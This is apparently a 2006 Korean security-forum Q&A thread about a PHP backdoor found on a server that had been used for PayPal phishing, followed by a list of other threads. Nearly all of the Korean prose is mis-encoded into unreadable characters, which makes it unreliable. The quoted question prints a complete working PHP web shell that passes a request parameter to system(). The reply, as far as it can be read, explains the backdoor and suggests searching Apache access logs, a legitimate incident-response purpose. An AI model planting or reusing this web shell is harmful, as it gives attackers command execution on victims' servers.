Å©·¡Å· ÇÇÇØ

 423, 11/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=217 [º¹»ç]


===============================================================================
>¿î¿µÇÏ°í ÀÖ´Â ¼­¹ö¿¡
><?if(count($_GET)) extract($_GET);if(count($_POST)) extract($_POST);if(count($_SERVER)) extract($_SERVER);echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd><input type=submit></form><hr>";if($cmd){$cmd = str_replace("\\", "", $cmd);echo "<pre>"; system($cmd); echo "</pre>";}?>
>
>À§ ÄÚµå¿Í ÇÔ²² paypal ÇǽÌÀ» ´çÇÏ¿´½À´Ï´Ù.
>À§ÀÇ ÄÚµåÀÇ ºÐ¼®À» ÇÊ¿ä·Î ÇÕ´Ï´Ù.
>±×·³ ¸¹Àº Á¶¾ð ºÎŹµå¸³´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
===============================================================================

ÇØ´ç ¼Ò½º ÄÚµå´Â backdoorÀÇ ÀÏÁ¾À¸·Î¼­, °ø°ÝÀÚ°¡ Àü´ÞÇÑ ¹®ÀÚ¿­À»

À¥ ¼­¹ö ±ÇÇÑÀÇ ½© ¸í·ÉÀ¸·Î ½ÇÇàÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù.

À§ ¼Ò½º ÄÚµå Áß Çٽɸ¸ ³²±â¸é <? system($cmd); ?> °¡ µË´Ï´Ù.

$cmd º¯¼ö·Î Àü´ÞµÈ ¹®ÀÚ¿­À» system ÇÔ¼ö·Î ½ÇÇàÇÑ´Ü ¸»ÀÔ´Ï´Ù.

´ëÀÀ ¹æ¾ÈÀ¸·Î½á..

¸ÕÀú, À§ ¼Ò½º ÄÚµåÀÇ ÆÄÀϸíÀ» À¥ ¼­¹ö ·Î±×¿¡¼­ °Ë»öÇØ º¸½Ã±â ¹Ù¶ø´Ï´Ù.

¿¹·Î, ¾ÆÆÄÄ¡¶ó¸é grep xxx.php /var/log/httpd/access_log °°Àº ¹æ¹ýÀ¸·Î

°Ë»öÇÏ½Ã¸é µË´Ï´Ù.

±×·³ ÀÌ ¹éµµ¾î ÆÄÀÏÀ» ¿äûÇÑ ·Î±×°¡ ³ª¿Ã °ÍÀÔ´Ï´Ù. (¸¸¾à °ø°ÝÀÚ°¡ ROOT

±ÇÇѱîÁö ȹµæÇÏ¿© ·Î±×¸¦ Áö¿ö¹ö·È´Ù¸é ³ª¿ÀÁö ¾ÊÀ» ¼öµµ ÀÖ½À´Ï´Ù.)

·Î±×°¡ ³ª¿Ô´Ù¸é IP¿Í REFERER ºÎºÐÀ» º¸°í °ø°ÝÀÚÀÇ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖÀ¸¸ç,

ÃÖÃÊ xxx.php°¡ ·Î±×¿¡ ³²Àº ½Ã°£À» ±âÁ¡À¸·Î ÁÖº¯ ·Î±×¸¦ ºÐ¼®ÇØ º¸½Ã¸é

°ø°ÝÀÚ°¡ ¾î¶² ¹æ¹ýÀ» ÀÌ¿ëÇؼ­ ¼­¹ö¿¡ ħÅõÇß´ÂÁö ãÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù. (À¥ÇØÅ·À¸·Î ħÅõÇß´Ù°í °¡Á¤)

ÀÌ Á¤º¸¸¦ ±â¹ÝÀ¸·Î Ãë¾àÁ¡ ÆÐÄ¡¿Í °ø°ÝÀÚ¿¡ ´ëÇÑ ¹ýÀû ´ëÀÀÀ» ÇϽñ⠹ٶø´Ï´Ù.

  Hit : 4118     Date : 2006/06/01 07:05



    
soarrr À½ ±×·¸±º¿ä Á¶¾ð Á¤¸» °¨»çµå¸³´Ï´Ù.. 2006/06/01  
223     [re] v.wom.conficker °¨¿°[2]     Ǫ¸¥ÇÏ´Ã
06/02 3932
222     [re] v.wom.conficker °¨¿°     rlawogus320
08/08 3565
221     [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..[2]     pr0sp3r
07/07 3807
    [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..[1]     ¸Û¸Û
06/01 4117
219     [re] Ȥ½Ã ¹ÙÀÌ·¯½ºÁß¿¡..     lkj22
08/16 2914
218     [re] Ȥ½Ã ¹ÙÀÌ·¯½ºÁß¿¡..[3]     lkj22
08/16 3237
217     [re] ÇØÄ¿¿Í Å©·¡Ä¿[3]     ¼Û½Ã
11/18 4164
216     [re] ÇØÄ¿¿Í Å©·¡Ä¿     ruo91
11/18 3288
215     [re] ÇØÄ¿¿Í Å©·¡Ä¿     ori0433
11/19 3771
214     [re] ÇØÄ¿¿Í Å©·¡Ä¿[3]     fhwmakdl
12/19 4172
213     [re] ÇØÄ¿°¡ µÇ°í½ÍÀºµ¥[1]     ¹«¼ÒÀ¯
12/16 4183
212     [re] ÇØÄð ¾Æµð ÇØÅ· -0-??     ¼ÒÀ¯
10/08 5023
211       [re] ÇØÄð ¾Æµð ÇØÅ· -0-??[5]     odk297
10/09 4332
210     [re] ÇØÅ·¶§¹®¿¡ ¹ÌÄ¡°Ú¾î¿ä~¤Ð¤Ð[2]     mnet21
03/08 4127
209     [re] ÇØÅ·À» ¾î¶² °æ·Î·Î ÇÏ°Ô µÇ´Â °ÇÁö=¤µ=;     X-line
12/18 3839
208     [re] ÇØÅ·Àº¾î¶»°ÔÇÏ´ÂÁö....     koresong
10/23 3260
207     [re] ÇØÅ·Àº¾î¶»°ÔÇÏ´ÂÁö....     ori0433
11/19 3694
206     [re] ÇØÅ· ±×·ì Áú¹®ÀÔ´Ï´Ù.     w0rm9
10/03 3684
205     [re] ÇÁ·Î±×·¡¹Ö ÄÄÆÄÀÏ ¹®Á¦Àε¥     ÃÖ¼±È£
12/07 3226
204     [re] ÁßÇб³¸¸È­ 4Æí Hello guta¿¡¼­     Tsum3000
02/28 3460
[1].. 11 [12][13][14][15][16][17][18][19][20]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org